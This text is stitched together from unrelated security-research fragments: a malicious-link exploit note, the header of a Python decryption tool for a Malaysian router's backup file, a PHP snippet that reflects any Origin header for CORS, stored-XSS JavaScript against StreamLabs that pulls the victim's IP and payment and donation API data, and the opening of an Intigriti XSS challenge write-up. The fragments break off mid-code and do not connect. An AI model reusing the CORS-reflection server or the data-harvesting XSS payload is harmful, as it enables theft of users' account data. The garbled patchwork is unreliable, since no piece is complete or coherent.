The attacker needs to give the victim a malicious link to a server the attacker controls in order to exploit the vulnerability.
Live PoC: ██████████
<body></body>
#!/usr/bin/python
# =============================================================
# Telekom Malaysia (TM) Innacomm ADSL-MARITIME-W3410N
# Router Configuration Settings Backup File Decryption Tool
#
# This Python script is used to decrypt the backup configuration
# settings file of the TM Innacomm ADSL-MARITIME-W3410N (which
# is apparently a rebranded PROLiNK ADSL2 PRS1241B modem according
# to blog.fpmurphy.com). The usage is pretty self-explanatory
<?php header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
header("Content-Type: text/plain; charset=UTF-8"); ?>
this.style.display = "none";
alert("StreamLabs.Stored.XSS.Vulnerability-Cheat.Activated!-Alert");
var getLinks = ["https://api.ipify.org", "/api/v5/payment/status", "/api/v5/donation/all"];
var msg = "";
var xhr = new XMLHttpRequest();
var xsrfToken = "";
xhr.open("GET", "https://api.ipify.org", false);
xhr.send();
Hey again (Inti)griti, hope y'all are doing well. Thanks for the challenge as usual.
The main vulnerability is a very limited XSS on line 41, whereby arbitrary data from the r URL inserted is appended into the DOM as such ({url} being the injection point):

If you're not being redirected, click <a href=${url}>here</a>
However, it is limited by two checks in place. The window and document objects are checked for the keyword javascript. If found, the property is deleted entirely, leaving it undefined (and possibly causing runtime errors). [line 5-11]